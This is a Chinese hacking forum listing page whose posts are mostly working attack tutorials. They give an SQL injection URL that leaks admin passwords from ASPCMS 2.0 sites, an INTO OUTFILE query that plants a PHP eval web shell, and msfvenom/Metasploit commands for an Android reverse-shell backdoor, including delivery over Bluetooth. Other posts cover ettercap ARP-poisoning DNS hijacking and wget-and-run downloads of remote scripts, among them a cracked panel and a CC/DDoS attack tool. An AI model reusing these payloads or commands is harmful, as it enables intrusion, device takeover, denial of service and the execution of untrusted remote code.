动态 版块 发帖 消息 我的
Loading...
HadSky
支持原创软件,共创美好明天!
子版块
admin
111
目前自助充值已完善,也可加管理QQ进行人工充值,QQ:27972179189(人工充值低至5折!一次性充值500送1000!共计2000RMB,500可得!)
 1   0  120天前
admin
37
这个漏洞是通过一段代码直接爆出后台密码,方式比较简单,工具的话就不分享了,直接采集关键词:powered by aspcms2.0然后直接在域名后面添加 代码   /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 然后就会爆出后台密码,自己MD5解密一下就好了,建议采集的时候直接采集后台,这样弄的话直接省去了爆破后台目录的时间,这个漏洞没多大意义,进去以后在模板里面添加一句话就好了,新手小白玩一玩还可以。然后菜刀连接直接提权。
 0   0  4天前
admin
29
第二课:简单的evalbase64php解密黑镰论坛http://black-sickle.com/evalbase64加密php非常常见,解密其实很简单,一个代码搞定所有PHP的解密都是把eval换为echo就可以了,没有什么技术可言。只是一个小常识
 0   0  5天前
admin
39
第一课:php探针拿shell提权黑镰论坛http://black-sickle.com/搜索引擎搜索关键字:©2015 UPUPW绿色服务器平台 版权所有目标站:http://www.118043.com/sql语句:select '<?php @eval($_POST[admin888]);?>'INTO OUTFILE '程序目录/a.php'
 0   0  5天前
admin
78
准备工作1.局域网环境(192.168.124.1)2.Kali Linux(192.168.124.8)3.安卓手机(由于没有手机在这里使用模拟器)安装Vmware虚拟机网络上有教程,不在多说下载Kali虚拟机镜像下载地址:点我进入在这里尽量下载OVA格式的,因为可以直接导入,在这里演示的为32位的kali linux导入虚拟机双击下载好的文件(ova格式)直接导入即可,如图所示开机前的设置导入好了之后需要事先设置一下,才能够开始使用,设置方法如下1.依次点击 虚拟机 -> 设置2.点击网络适配器3.设置为桥接模式,设置好了如图所示然后点击确定,保存设置运行Kali都设置好了就可以开机了,点击开启此虚拟机默默等待开机,然后输入账号密码(默认账号:root,默认密码:toor)开机之后点击终端,就可以开始下一步操作了PS:终端为左侧工具栏第二个,如果找不到你可以点右上角了制作后门首先我们要确定自己的ip,在终端中输入下面的指令即可ifconfig可以看到我们的内网ip是192.168.124.8,证明刚刚设置的桥接已经成功的让我们的kali融入了我们的局域网环境然后就是制作后门了,在终端输入以下指令,然后回车msfvenom -p android/meterpreter/reverse_tcp LHOST=内网ip LPORT=监听端口 > 生成的文件名PS:指令自行替换,文件名必须以.apk结尾,然后监听端口建议为443如图所示,即为成功了,然后就可以放到手机里面去安装了安装由于没有手机,在这里用模拟器来演示我已经把后门转移到了安卓模拟器里面,至于方法还是开动你的脑子吧我们可以看到,这个12kb的安装包需要的权限还是比较多的,然后安装安装好了之后,打开没反应?其实不然,这个后门没有任何界面,直接后台运行,下面开始教如何启动这个后门启动后门还是利用kali的终端,依次输入下方的指令msfconsole然后等待下方的界面出现,等待的时间有点长出现了之后依次执行下面的指令msf > use exploit/multi/handler       > set payload android/meterpreter/reverse_tcp       > set lhost 内网ip > set lport 监听端口       > exploit这里设置的需要和后门那里一样,执行最后一个代码之后就可以在模拟器(手机)里面运行后门 然后终端这里就会有反应,之后就可以利用终端来控制手机了输入help可以查看帮助,这里帮大家汉化了一下常用的指令
 0   0  47天前
admin
70
准备工作2.Kali Linux(使用树莓派来运行)3.安卓手机(需要支持蓝牙)使用树莓派扫描蓝牙具体步骤如下:1.运行Kali,打开终端,输入以下指令激活蓝牙root@kali:~# hciconfigroot@kali:~# hciconfig hci0 up2.扫描蓝牙设备root@kali:~# hcitool scan在这里我们可能搜索不到蓝牙设备,因为部分手机开启了隐藏使用fang扫描隐藏的蓝牙使用fang工具可以扫描出隐藏的蓝牙设备,可以设置扫描范围,默认为000000000000>>>ffffffffff,这里为了效果设置的小一些,实战就没有这么简单了用法:fang -r 范围 -sroot@kali:~# fang -r b0aa3618e5d8-b0aa3618e5f4 -sok,扫到一个myteelphone的设备:使用blueranger工具强制连接蓝牙用法:blueranger.sh <hciX> <bdaddr>root@kali:~# blueranger.sh hci0 b0:aa:36:18:e5:e4kali显示:手机端显示:使用msf生成后门过程不做介绍了,具体查看我之前发布的文章[网络攻防]演示使用Metasploit入侵安卓设备:点我进入生成好了用系统自带的蓝牙发送到手机,假设对方接收了后门并且运行到这里大功告成,已经已经成功渗透 
 0   0  47天前
admin
70
Kali号称全世界最好用的黑客操作系统,那么今天我给大家带来的是Kali简单DNS劫持1.安装Kali这个过程有的是,建议大家拿VM虚拟机测试就好,别忘了设置桥接2.打开ettercap应用程序 -> 嗅探/欺骗 -> ettercap3.DNS劫持第一步:Arp欺骗1) sniff -> Unfiled sniffing...2) 然后选择网卡(网线和虚拟机的话选eth0,wifi的话选wlan0),点确定3)Hosts -> scan for hosts4)等待扫描完成后 Hosts -> Hosts List8)右键你要攻击的 设置为 Target1 网关 设置为 Target29)Mitm -> ARP poisoning 在弹出的框框勾选第一个10) 到此我们已经完成了Arp欺骗,如何验证Arp欺骗是否成功呢?Win+R 运行 -> cmd -> 输入 arp -a -> 回车我们可以看到在ARP缓存表中网关(192.168.124.1) 的Mac地址已经变成Kali(192.168.124.23)的Mac地址,这就可以开始下一步了。4.DNS劫持1)首先我们需要准备一个劫持之后转向的地址,在这里用Kali的Apache来实现打开文件管理器,编辑/var/www/html/index.html文件,随便写一个网页,然后保存2) 在终端里 输入 service apache2 start  打开Apache服务,然后在浏览器里输入Kali的IP验证是否打开3) 在终端里输入 gedit /etc/ettercap/etter.dns 来修改 ettercap 的DNS劫持插件的配置在这里可以使用 通配符 * 来代表 要劫持的域名 具体格式是[域名] [记录值] [转向]比如我要把www.sogou.com转到Kali就写成www.sougou.com A Kali的ip4)修改好配置文件就可以启动DNS劫持插件了,Ettercap -> Plugins -> Manage the plugins到此我们就完成了DNS劫持的所有步骤,验证效果可以打开受害主机的浏览器,输入配置文件里面跳转的域名,验证效果。
 0   0  47天前
admin
185
登录上LINUX服务器,直接复制下列地址,即可一键搭建,按照提示输入username(用户名)和password(密码),回车等待安装完,回到电脑新建VPN连接,输入VPS的IP地址以及刚才设置的用户名、密码即可连接!手机也可以用自带的vpn功能连接,没有后门,不信可以自己翻代码找。wget http://black-sickle.com/sh/vpn_centos.sh chmod +x ./vpn_centos.sh ./vpn_centos.sh
 2   1  102天前
admin
247
现在网上大部分都是5.9版本的脚本,今天给大家更新6.9.5的安装脚本:wget http://black-sickle.com/baota_pro/btcrack.sh;shbtcrack.sh
 8   27  115天前
华尅
149
这个脚本可以攻击服务器和网站(仅用于linux系统)用ssh软件登录你的服务器执行以下脚本wget https://6y3a.cn/hp.sh -O hp.sh;sh hp.sh再输入你要cc的网站注意要带http://或https://然后输入线程数,最大1000 建议输入500当然你服务器好的话可以试试一千[滑稽][滑稽][滑稽]测试打阿里云的学生机和香港这些没防御的可以jj警告:请勿攻击正规网站,企业备案的网站否则后果自负,本人不承担任何责任
 1   0  115天前
admin
69
ASP网马+工具
 5   0  117天前
快速发帖 高级模式
guest
登录之后更精彩~
Powered by HadSky 7.3.3
© 2015-2019 PuYueTian
您的IP:3.227.2.109,2019-10-18 11:43:36,Processed in 0.01596 second(s).
Powered by HadSky
本站技术仅供学习,抵制违法使用,共建绿色互联网!